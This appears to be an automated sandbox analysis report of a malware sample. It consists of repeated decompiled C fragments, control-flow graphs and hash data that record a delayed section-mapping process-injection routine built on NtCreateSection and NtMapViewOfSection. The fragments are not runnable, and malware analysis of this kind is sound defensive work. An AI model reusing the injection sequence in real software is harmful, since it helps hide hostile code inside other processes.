                                                                                  				_push(0x374);
                                                                                  			}






















                                                                                  0x004015ec
                                                                                  0x004015fc

                                                                                  APIs
                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016F4
                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401735
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401766
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401788
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.1038324993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_14_2_400000_efbhiii.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                  • String ID:
                                                                                  • API String ID: 1546783058-0
                                                                                  • Opcode ID: 6ff70707f6df06a6ccecdcb67c6e9e884a685d97cc4de85dc700c03c7ee269e8
                                                                                  • Instruction ID: 0d5890da022090a977656a76e4e0e389f4a94210290042ef828f6671061bd0b5
                                                                                  • Opcode Fuzzy Hash: 6ff70707f6df06a6ccecdcb67c6e9e884a685d97cc4de85dc700c03c7ee269e8
                                                                                  • Instruction Fuzzy Hash: 2F513CB5500205BFEB209F91CC49FAF7BB8EF85B10F10012AF912BA2E5D7759941CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 100%
                                                                                  			E004015D5(void* __edx) {
                                                                                  				void* _t4;
                                                                                  
                                                                                  				 *((intOrPtr*)(_t4 - 0x77)) =  *((intOrPtr*)(_t4 - 0x77)) + __edx;
                                                                                  			}




                                                                                  0x004015d5

                                                                                  APIs
                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016F4
                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401735
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401766
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401788
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.1038324993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_14_2_400000_efbhiii.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                  • String ID:
                                                                                  • API String ID: 1546783058-0
                                                                                  • Opcode ID: 0062549318bbf479dc1fe13b7535a0ebf43337b757e2c1b9ef8c31d90750064d
                                                                                  • Instruction ID: 9ff45383df48fb0826de9a286d7e4e1324ef41f44cc430fddfaef00f0ae6a2d7
                                                                                  • Opcode Fuzzy Hash: 0062549318bbf479dc1fe13b7535a0ebf43337b757e2c1b9ef8c31d90750064d
                                                                                  • Instruction Fuzzy Hash: 2E51F8B4900249BFEB208F91CC48FEFBBB8EF85B10F100169F911BA2A5D7759945CB64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 82 4015e2-401621 call 4012bf 89 401623 82->89 90 401626-40162b 82->90 89->90 92 401631-401642 90->92 93 40194e-401956 90->93 96 401648-401671 92->96 97 40194c-40196c 92->97 93->90 96->97 105 401677-40168e NtDuplicateObject 96->105 101 401962-401968 97->101 102 40196f-40198b call 4012bf 97->102 101->102 105->97 107 401694-4016b8 NtCreateSection 105->107 109 401714-40173a NtCreateSection 107->109 110 4016ba-4016db NtMapViewOfSection 107->110 109->97 114 401740-401744 109->114 110->109 112 4016dd-4016f9 NtMapViewOfSection 110->112 112->109 115 4016fb-401711 112->115 114->97 116 40174a-40176b NtMapViewOfSection 114->116 115->109 116->97 117 401771-40178d NtMapViewOfSection 116->117 117->97 118 401793 call 401798 117->118
                                                                                  C-Code - Quality: 68%
                                                                                  			E004015E2(void* __edi, void* __esi, void* __fp0) {
                                                                                  				void* _t84;
                                                                                  				void* _t175;
                                                                                  				void* _t184;
                                                                                  
                                                                                  				_t184 = __esi;
                                                                                  				_t175 = __edi;
                                                                                  				_t84 = 0x1613;
                                                                                  				_push(0x374);
                                                                                  			}






                                                                                  0x004015e2
                                                                                  0x004015e2
                                                                                  0x004015ec
                                                                                  0x004015fc

                                                                                  APIs
                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016F4
                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401735
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401766
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401788
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.1038324993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_14_2_400000_efbhiii.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                  • String ID:
                                                                                  • API String ID: 1546783058-0
                                                                                  • Opcode ID: 444aa009c48ada74fa89dbfd7bbcf1eb4eb2f253530a4383063b6273bfe597cc
                                                                                  • Instruction ID: 786437f5aaac71635f62937e58460e603824b182e89f0a7aff4bd48dbc40d357
                                                                                  • Opcode Fuzzy Hash: 444aa009c48ada74fa89dbfd7bbcf1eb4eb2f253530a4383063b6273bfe597cc
                                                                                  • Instruction Fuzzy Hash: 815127B4900249BFEB208F91CC48FEFBBB8EF85B10F104169F911BA2A5D7749945CB64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 121 4015ef-401621 call 4012bf 128 401623 121->128 129 401626-40162b 121->129 128->129 131 401631-401642 129->131 132 40194e-401956 129->132 135 401648-401671 131->135 136 40194c-40196c 131->136 132->129 135->136 144 401677-40168e NtDuplicateObject 135->144 140 401962-401968 136->140 141 40196f-40198b call 4012bf 136->141 140->141 144->136 146 401694-4016b8 NtCreateSection 144->146 148 401714-40173a NtCreateSection 146->148 149 4016ba-4016db NtMapViewOfSection 146->149 148->136 153 401740-401744 148->153 149->148 151 4016dd-4016f9 NtMapViewOfSection 149->151 151->148 154 4016fb-401711 151->154 153->136 155 40174a-40176b NtMapViewOfSection 153->155 154->148 155->136 156 401771-40178d NtMapViewOfSection 155->156 156->136 157 401793 call 401798 156->157
                                                                                  C-Code - Quality: 50%
                                                                                  			E004015EF(void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                                                  				void* _t84;
                                                                                  				void* _t174;
                                                                                  				void* _t183;
                                                                                  
                                                                                  				_t183 = __esi;
                                                                                  				_t174 = __edi;
                                                                                  				asm("enter 0xeb5d, 0xf4");
                                                                                  				_t84 = 0x1613;
                                                                                  				_push(0x374);
                                                                                  			}






                                                                                  0x004015ef
                                                                                  0x004015ef
                                                                                  0x004015ef
                                                                                  0x004015ec
                                                                                  0x004015fc

                                                                                  APIs
                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016F4
                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401735
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401766
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401788
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.1038324993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_14_2_400000_efbhiii.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                  • String ID:
                                                                                  • API String ID: 1546783058-0
                                                                                  • Opcode ID: 593592a389a18e9ff3cf9be2642554562a363e94e81370f5fce736fd81cd0569
                                                                                  • Instruction ID: 8056fab5990907f184dcc33f0ebd9c45d80b5d949791b609f029eb95c4498140
                                                                                  • Opcode Fuzzy Hash: 593592a389a18e9ff3cf9be2642554562a363e94e81370f5fce736fd81cd0569
                                                                                  • Instruction Fuzzy Hash: AC5117B4900249BFEB208F91CC48FEFBBB8EF85B10F100169F911BA2A5D7759944CB64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 160 4015f6-4015fd 161 401602-401621 call 4012bf 160->161 162 4015ff-401601 160->162 166 401623 161->166 167 401626-40162b 161->167 162->161 166->167 169 401631-401642 167->169 170 40194e-401956 167->170 173 401648-401671 169->173 174 40194c-40196c 169->174 170->167 173->174 182 401677-40168e NtDuplicateObject 173->182 178 401962-401968 174->178 179 40196f-40198b call 4012bf 174->179 178->179 182->174 184 401694-4016b8 NtCreateSection 182->184 186 401714-40173a NtCreateSection 184->186 187 4016ba-4016db NtMapViewOfSection 184->187 186->174 191 401740-401744 186->191 187->186 189 4016dd-4016f9 NtMapViewOfSection 187->189 189->186 192 4016fb-401711 189->192 191->174 193 40174a-40176b NtMapViewOfSection 191->193 192->186 193->174 194 401771-40178d NtMapViewOfSection 193->194 194->174 195 401793 call 401798 194->195
                                                                                  C-Code - Quality: 58%
                                                                                  			E004015F6(void* __eax, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                                                  				void* _t84;
                                                                                  				void* _t174;
                                                                                  				void* _t183;
                                                                                  				void* _t198;
                                                                                  
                                                                                  				_t183 = __esi;
                                                                                  				_t174 = __edi;
                                                                                  				_t84 = __eax;
                                                                                  				_t198 = 0xd31bcf32;
                                                                                  				asm("int 0x68");
                                                                                  				_push(0x374);
                                                                                  			}







                                                                                  0x004015f6
                                                                                  0x004015f6
                                                                                  0x004015f6
                                                                                  0x004015f6
                                                                                  0x004015fb
                                                                                  0x004015fc

                                                                                  APIs
                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.1038324993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_14_2_400000_efbhiii.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$View$CreateDuplicateObject
                                                                                  • String ID:
                                                                                  • API String ID: 3617974760-0
                                                                                  • Opcode ID: c22fe54737c620c68f23b2895a4951b95a0da419d199e203eb4d30b80168da78
                                                                                  • Instruction ID: 8a50d415183a273aa1a09ec5cfc0b66a711e3eaeac860d1ed6f1fb4bdc85a088
                                                                                  • Opcode Fuzzy Hash: c22fe54737c620c68f23b2895a4951b95a0da419d199e203eb4d30b80168da78
                                                                                  • Instruction Fuzzy Hash: 185119B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911AA2A5D7749944CB64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 233 40198e-4019e0 call 4012bf Sleep call 401505 244 4019e2-4019ea call 4015d6 233->244 245 4019ef-401a16 233->245 244->245 252 401a19-401a22 call 4012bf 245->252 253 401a0d-401a12 245->253 253->252
                                                                                  C-Code - Quality: 33%
                                                                                  			E0040198E(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                  				char _v8;
                                                                                  				void* _t8;
                                                                                  				void* _t11;
                                                                                  				intOrPtr* _t16;
                                                                                  				void* _t18;
                                                                                  
                                                                                  				_t21 = __eflags;
                                                                                  				_t19 = __edi;
                                                                                  				_t8 = 0x19c3;
                                                                                  				_push(0x5b);
                                                                                  				E004012BF(_t8, __edi, __esi, __eflags);
                                                                                  				_t16 = _a4;
                                                                                  				Sleep(0x1388);
                                                                                  				_push( &_v8);
                                                                                  				_push(_a12);
                                                                                  				_push(_a8);
                                                                                  				_push(_t16); // executed
                                                                                  				_t11 = E00401505(_t16, _t18, _t19, __esi, _t21); // executed
                                                                                  				if(_t11 != 0) {
                                                                                  					E004015D6(_t18, __fp0, _t16, _t11, _v8, _a16); // executed
                                                                                  				}
                                                                                  				 *_t16(0xffffffff, 0);
                                                                                  			}








                                                                                  0x0040198e
                                                                                  0x0040198e
                                                                                  0x004019a4
                                                                                  0x004019b4
                                                                                  0x004019be
                                                                                  0x004019c3
                                                                                  0x004019cb
                                                                                  0x004019d1
                                                                                  0x004019d2
                                                                                  0x004019d5
                                                                                  0x004019d8
                                                                                  0x004019d9
                                                                                  0x004019e0
                                                                                  0x004019ea
                                                                                  0x004019ea
                                                                                  0x004019f3

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019CB
                                                                                    • Part of subcall function 004015D6: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                    • Part of subcall function 004015D6: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                    • Part of subcall function 004015D6: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.1038324993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_14_2_400000_efbhiii.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                  • String ID:
                                                                                  • API String ID: 1885482327-0
                                                                                  • Opcode ID: f7b2af990834639229ccfabb40bfb65ed4cd40ece049db58581dba00d3209e05
                                                                                  • Instruction ID: 0aa20d2447839de78841e397ac8e9610b2a8b1345c7799d76695abdccd177be1
                                                                                  • Opcode Fuzzy Hash: f7b2af990834639229ccfabb40bfb65ed4cd40ece049db58581dba00d3209e05
                                                                                  • Instruction Fuzzy Hash: 83016276204204FADB016AD59DA1EBB3619AB40765F204177BA03B80F1D57C9512EB6F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 256 4019a8-4019e0 call 4012bf Sleep call 401505 267 4019e2-4019ea call 4015d6 256->267 268 4019ef-401a16 256->268 267->268 275 401a19-401a22 call 4012bf 268->275 276 401a0d-401a12 268->276 276->275
                                                                                  C-Code - Quality: 28%
                                                                                  			E004019A8(void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                  				void* _t8;
                                                                                  				void* _t11;
                                                                                  				intOrPtr* _t15;
                                                                                  				void* _t17;
                                                                                  				void* _t20;
                                                                                  
                                                                                  				_t21 = __eflags;
                                                                                  				_t18 = __edi;
                                                                                  				asm("pushad");
                                                                                  				_t8 = 0x19c3;
                                                                                  				_push(0x5b);
                                                                                  				E004012BF(_t8, __edi, __esi, __eflags);
                                                                                  				_t15 =  *((intOrPtr*)(_t20 + 8));
                                                                                  				Sleep(0x1388);
                                                                                  				_push(_t20 - 4);
                                                                                  				_push( *((intOrPtr*)(_t20 + 0x10)));
                                                                                  				_push( *((intOrPtr*)(_t20 + 0xc)));
                                                                                  				_push(_t15); // executed
                                                                                  				_t11 = E00401505(_t15, _t17, _t18, __esi, _t21); // executed
                                                                                  				if(_t11 != 0) {
                                                                                  					E004015D6(_t17, __fp0, _t15, _t11,  *((intOrPtr*)(_t20 - 4)),  *((intOrPtr*)(_t20 + 0x14))); // executed
                                                                                  				}
                                                                                  				 *_t15(0xffffffff, 0);
                                                                                  			}








                                                                                  0x004019a8
                                                                                  0x004019a8
                                                                                  0x004019a8
                                                                                  0x004019a4
                                                                                  0x004019b4
                                                                                  0x004019be
                                                                                  0x004019c3
                                                                                  0x004019cb
                                                                                  0x004019d1
                                                                                  0x004019d2
                                                                                  0x004019d5
                                                                                  0x004019d8
                                                                                  0x004019d9
                                                                                  0x004019e0
                                                                                  0x004019ea
                                                                                  0x004019ea
                                                                                  0x004019f3

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019CB
                                                                                    • Part of subcall function 004015D6: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                    • Part of subcall function 004015D6: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                    • Part of subcall function 004015D6: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.1038324993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_14_2_400000_efbhiii.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                  • String ID:
                                                                                  • API String ID: 1885482327-0
                                                                                  • Opcode ID: cc4124f378ebfb8c4d973cfa0ba6405577624e74c9170e10ce5433047a2dd39d
                                                                                  • Instruction ID: cd4efd820325f2828676bad7863f4c1c9c8e29e5d8c4dba0a8040b1c4b417e4a
                                                                                  • Opcode Fuzzy Hash: cc4124f378ebfb8c4d973cfa0ba6405577624e74c9170e10ce5433047a2dd39d
                                                                                  • Instruction Fuzzy Hash: C8F0A476304204FADB015ED19DA1EBA36159B44325F204177B603B80F1D63C8602FB2F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 279 40199e-4019e0 call 4012bf Sleep call 401505 289 4019e2-4019ea call 4015d6 279->289 290 4019ef-401a16 279->290 289->290 297 401a19-401a22 call 4012bf 290->297 298 401a0d-401a12 290->298 298->297
                                                                                  C-Code - Quality: 33%
                                                                                  			E0040199E(void* __eax, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                  				void* _t11;
                                                                                  				void* _t14;
                                                                                  				intOrPtr* _t18;
                                                                                  				void* _t22;
                                                                                  				void* _t25;
                                                                                  
                                                                                  				_t26 = __eflags;
                                                                                  				_t23 = __edi;
                                                                                  				_t11 = 0x19c3;
                                                                                  				_push(0x5b);
                                                                                  				E004012BF(_t11, __edi, __esi, __eflags);
                                                                                  				_t18 =  *((intOrPtr*)(_t25 + 8));
                                                                                  				Sleep(0x1388);
                                                                                  				_push(_t25 - 4);
                                                                                  				_push( *((intOrPtr*)(_t25 + 0x10)));
                                                                                  				_push( *((intOrPtr*)(_t25 + 0xc)));
                                                                                  				_push(_t18); // executed
                                                                                  				_t14 = E00401505(_t18, _t22, _t23, __esi, _t26); // executed
                                                                                  				if(_t14 != 0) {
                                                                                  					E004015D6(_t22, __fp0, _t18, _t14,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
                                                                                  				}
                                                                                  				 *_t18(0xffffffff, 0);
                                                                                  			}








                                                                                  0x0040199e
                                                                                  0x0040199e
                                                                                  0x004019a4
                                                                                  0x004019b4
                                                                                  0x004019be
                                                                                  0x004019c3
                                                                                  0x004019cb
                                                                                  0x004019d1
                                                                                  0x004019d2
                                                                                  0x004019d5
                                                                                  0x004019d8
                                                                                  0x004019d9
                                                                                  0x004019e0
                                                                                  0x004019ea
                                                                                  0x004019ea
                                                                                  0x004019f3

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019CB
                                                                                    • Part of subcall function 004015D6: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                    • Part of subcall function 004015D6: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                    • Part of subcall function 004015D6: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.1038324993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_14_2_400000_efbhiii.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                  • String ID:
                                                                                  • API String ID: 1885482327-0
                                                                                  • Opcode ID: 4cda74984199fe5fdcc62c39ea14e1dc28dd1d6ece90b76e1d1edcb9b8d3ca26
                                                                                  • Instruction ID: 1d23cc1d6f9959439ea987ff8db1f24ad8dc78c76834636317f07c9066609db8
                                                                                  • Opcode Fuzzy Hash: 4cda74984199fe5fdcc62c39ea14e1dc28dd1d6ece90b76e1d1edcb9b8d3ca26
                                                                                  • Instruction Fuzzy Hash: 56F0C276304205FBDB015ED19DA1EBE3219AB40325F204277BA03B90F1D63C8602FB2B
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 301 4019ab-4019e0 call 4012bf Sleep call 401505 310 4019e2-4019ea call 4015d6 301->310 311 4019ef-401a16 301->311 310->311 318 401a19-401a22 call 4012bf 311->318 319 401a0d-401a12 311->319 319->318
                                                                                  C-Code - Quality: 25%
                                                                                  			E004019AB(void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                  				void* _t8;
                                                                                  				void* _t11;
                                                                                  				intOrPtr* _t15;
                                                                                  				void* _t17;
                                                                                  				void* _t20;
                                                                                  
                                                                                  				_t21 = __eflags;
                                                                                  				_t18 = __edi;
                                                                                  				asm("scasd");
                                                                                  				_push(0x5b);
                                                                                  				E004012BF(_t8, __edi, __esi, __eflags);
                                                                                  				_t15 =  *((intOrPtr*)(_t20 + 8));
                                                                                  				Sleep(0x1388);
                                                                                  				_push(_t20 - 4);
                                                                                  				_push( *((intOrPtr*)(_t20 + 0x10)));
                                                                                  				_push( *((intOrPtr*)(_t20 + 0xc)));
                                                                                  				_push(_t15); // executed
                                                                                  				_t11 = E00401505(_t15, _t17, _t18, __esi, _t21); // executed
                                                                                  				if(_t11 != 0) {
                                                                                  					E004015D6(_t17, __fp0, _t15, _t11,  *((intOrPtr*)(_t20 - 4)),  *((intOrPtr*)(_t20 + 0x14))); // executed
                                                                                  				}
                                                                                  				 *_t15(0xffffffff, 0);
                                                                                  			}








                                                                                  0x004019ab
                                                                                  0x004019ab
                                                                                  0x004019ab
                                                                                  0x004019b4
                                                                                  0x004019be
                                                                                  0x004019c3
                                                                                  0x004019cb
                                                                                  0x004019d1
                                                                                  0x004019d2
                                                                                  0x004019d5
                                                                                  0x004019d8
                                                                                  0x004019d9
                                                                                  0x004019e0
                                                                                  0x004019ea
                                                                                  0x004019ea
                                                                                  0x004019f3

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019CB
                                                                                    • Part of subcall function 004015D6: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                    • Part of subcall function 004015D6: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                    • Part of subcall function 004015D6: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.1038324993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_14_2_400000_efbhiii.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                  • String ID:
                                                                                  • API String ID: 1885482327-0
                                                                                  • Opcode ID: cc42d651ce71517080449790dab5af19937afd1f012226342f5998b84b3007a9
                                                                                  • Instruction ID: 5a5749d72c8a791954f89c67905b043f8ffa113a7fe08d61e0168edf760d7917
                                                                                  • Opcode Fuzzy Hash: cc42d651ce71517080449790dab5af19937afd1f012226342f5998b84b3007a9
                                                                                  • Instruction Fuzzy Hash: 18F09676304204FBDB015ED19D91EAE32199B44315F204277BA03B80F1D63C8512FF2B
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 322 4019ae-4019e0 call 4012bf Sleep call 401505 329 4019e2-4019ea call 4015d6 322->329 330 4019ef-401a16 322->330 329->330 337 401a19-401a22 call 4012bf 330->337 338 401a0d-401a12 330->338 338->337
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019CB
                                                                                    • Part of subcall function 004015D6: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                    • Part of subcall function 004015D6: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                    • Part of subcall function 004015D6: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.1038324993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_14_2_400000_efbhiii.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                  • String ID:
                                                                                  • API String ID: 1885482327-0
                                                                                  • Opcode ID: 1ab0b94f97cddce7fe3d3ca4062fd24c080078a7160b19a57c2bf38a9fe7cd07
                                                                                  • Instruction ID: 1e859a61d86f5cd1831732a8203d1a095f79bb04fba549480ad92d8a0b8a5086
                                                                                  • Opcode Fuzzy Hash: 1ab0b94f97cddce7fe3d3ca4062fd24c080078a7160b19a57c2bf38a9fe7cd07
                                                                                  • Instruction Fuzzy Hash: 89F09032304204FBDB016ED19D81EAE3219AB40316F204277BA03B80F1DA3C8912AB2B
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 341 4019b9-4019e0 call 4012bf Sleep call 401505 347 4019e2-4019ea call 4015d6 341->347 348 4019ef-401a16 341->348 347->348 355 401a19-401a22 call 4012bf 348->355 356 401a0d-401a12 348->356 356->355
                                                                                  C-Code - Quality: 33%
                                                                                  			E004019B9(signed int __eax, void* __edi, void* __esi, void* __fp0) {
                                                                                  				void* _t12;
                                                                                  				intOrPtr* _t16;
                                                                                  				void* _t18;
                                                                                  				void* _t21;
                                                                                  				signed int _t22;
                                                                                  
                                                                                  				_t19 = __edi;
